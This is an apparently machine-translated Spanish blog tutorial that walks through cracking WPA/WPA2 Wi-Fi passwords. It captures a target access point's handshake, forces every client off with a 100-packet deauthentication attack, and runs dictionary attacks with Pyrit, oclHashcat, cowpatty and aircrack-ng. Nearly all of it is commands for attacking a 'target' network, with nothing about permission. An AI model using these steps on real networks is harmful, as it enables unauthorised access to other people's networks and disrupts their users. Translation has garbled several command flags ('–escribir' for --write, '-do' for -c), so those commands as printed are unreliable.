3 formas de descifrar Wifi usando Pyrit, oclHashcat y Cowpatty




Primero inicie el modo monitor en nuestro adaptador inalámbrico.
airmon-ng start wlan0
Ahora el modo monitor está habilitado con el nombre wlan0mon .
y luego, con el siguiente comando, comience a escuchar todas las conexiones wifi disponibles:
airodump-ng wlan0mon

Después de ejecutar el comando anterior, comenzará a escuchar todo el tráfico wifi cercano, así que espere hasta que aparezca su objetivo y luego presione ctrl ^ c .
Ahora tenemos que escuchar un canal específico en el que está presente el objetivo. Ahora ejecuta el comando:
airodump-ng -c 2 –bssid 3C: 1E: 04: XX: XX: XX –escribir sommay wlan0mon
-c == número de canal del objetivo (2 en mi caso, vea la columna CH)
–Bssid == dirección MAC del AP objetivo
–Escribir == nombre del archivo de captura
Ahora espere hasta que se capture el apretón de manos WPA y luego presione crtl ^ c .
Ahora se generará un archivo llamado sommay-01.cap

PIRITA
El primer método para descifrar la contraseña del archivo de captura es PYRIT . Usaremos el ataque de diccionario para ejecutar el comando:
pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough
-i == ruta al archivo de entrada en nuestro caso es la ruta al diccionario
-r == ruta al archivo capturado que (en nuestro caso es sommay-01.cap)
attack_passthrough == esta opción es para especificar que se debe realizar un ataque de diccionario
Como puede ver, ha descifrado con éxito la contraseña.
OCLHASHCAT
En primer lugar, descargue oclhashcat desde su sitio web oficial: https://hashcat.net/files/hashcat-2.00.7z
Primero tenemos que convertir el archivo .cap que capturamos con airodump-ng previamente a .hccap con aircrack-ng por comando:
aircrack-ng sommay-01.cap -J sommay-01
-J == la ruta al archivo de salida con extensión .hccap
Ahora copie el diccionario que desea usar en la carpeta Hashcat. Ahora ingrese en la carpeta hashcat y ejecute el comando:
./hashcat-cli64.bin -m 2500 /root/sommay-01.hccap passwords.lst
En el comando anterior, si está utilizando un sistema de 32 bits , reemplace 64 con 32 .
-m es el tipo hash que es 2500 para el craqueo de WPA / WPA2
luego proporcione la ruta al archivo .hccap que convirtió con aircrack-ng. y luego el nombre del archivo de diccionario. Como puede ver, ha descifrado con éxito la contraseña.
COWPATTY
Para descifrar con la ayuda de cowpatty , primero tenemos que generar el archivo hash específico para el AP objetivo. Para esto usaremos genpmk, así que ejecuta el comando:
genpmk -f passwords.lst -d cowpatty_dict -s SOMMAY
-f == ruta al archivo del diccionario
-d == nombre del diccionario de salida
-s == ESSID (Nombre) del AP objetivo (El nombre debe ser idéntico al AP objetivo)
Ahora generará un archivo de diccionario llamado cowpatty_dict que acelerará el proceso de craqueo.
Ahora ejecuta el comando:
cowpatty -d cowpatty_dict -r sommay-01.cap -s SOMMAY
-d == ruta al diccionario que generamos con genpmk
-r == ruta al archivo de captura que generamos con airodump-ng
-s == ESSID del AP objetivo (el nombre debe ser idéntico al AP objetivo)

Autor: Himanshu Gupta es investigador de seguridad de la información | Escritor técnico. Puedes seguirlo en LinkedIn .

Descifra la contraseña de Wifi usando Aircrack-Ng (Guía para principiantes)

Este es el método clásico de descifrado de contraseñas inalámbricas. Todas las herramientas usan este método de una forma u otra.
Primero inicie el modo de monitor que escuchará todas las conexiones wifi cercanas con el comando:
airmon-ng start wlan0
En su esquina inferior derecha verá escrito. modo monitor habilitado para [phy1] wlan0mon
Ahora ejecute el siguiente comando para confirmar que nuestro adaptador wifi está en modo monitor, así que ejecute el comando:
ifconfig
que le mostrará el adaptador wifi ya que wlan0mon significa que el adaptador está en modo monitor.
Ahora ejecuta el comando:
airodump-ng wlan0mon
El comando anterior comenzará a escuchar todas las conexiones wifi disponibles.
Ahora, cuando su objetivo aparezca, presione ctrl ^ c y luego capture el comando de tipo apretón de manos:
airodump-ng -c 7 –bssid C8: XX: 35: XX: FD: F0 –escribe 1 wlan0mon
Aquí,
-c es el canal no. del AP que se enumerará en la columna CH en la salida del comando anterior, ya que en mi caso es 7.
–Bssid es la dirección MAC del AP objetivo ya que en mi caso es rajlab y bssid es C8: 3A: XX: 44: XX: F0
–Escribir es el archivo de captura en el que se guardarán los paquetes de captura, ya que en mi caso lo he nombrado como 1 .
Opción Descripción
-do El canal para la red inalámbrica.
–Bssid La dirección MAC del punto de acceso.
-w El prefijo del nombre del archivo que contendrá el protocolo de enlace de autenticación
mon0 La interfaz inalámbrica


Ahora comience el ataque deauth para desconectar todos los clientes conectados a ese AP que ayudará a capturar el apretón de manos con el comando:
aireplay-ng -0 100 –a XX: 3A: 35: XX: FD: F0 -e rajlab wlan0mon
Aquí,
-0 se usa para el ataque de deauth
100 es no. de paquetes de deauth que se enviarán
-a es la dirección MAC de AP de destino
-e es el ESSID del AP objetivo, es decir, el nombre del AP objetivo
Después de lanzar el ataque deauth , obtendremos el protocolo de enlace WPA en la ventana de terminal anterior en la esquina superior derecha y luego presionaremos ctrl ^ c .
Ahora tenemos que descifrar la contraseña con aircrack-ng, así que escriba command:
aircrack-ng 1-01.cap –w /usr/share/nmap/nselib/data/passwords.lst
Aquí,
1-01.cap es el archivo de captura que generamos en airodump-ng.
-w es el diccionario que se utilizará para realizar ataques de diccionario
En mi caso, la clave se encuentra como KEY FOUND! [raj123987]
Ar-themes Logo

XENTURIANS

No hay comentarios:

Publicar un comentario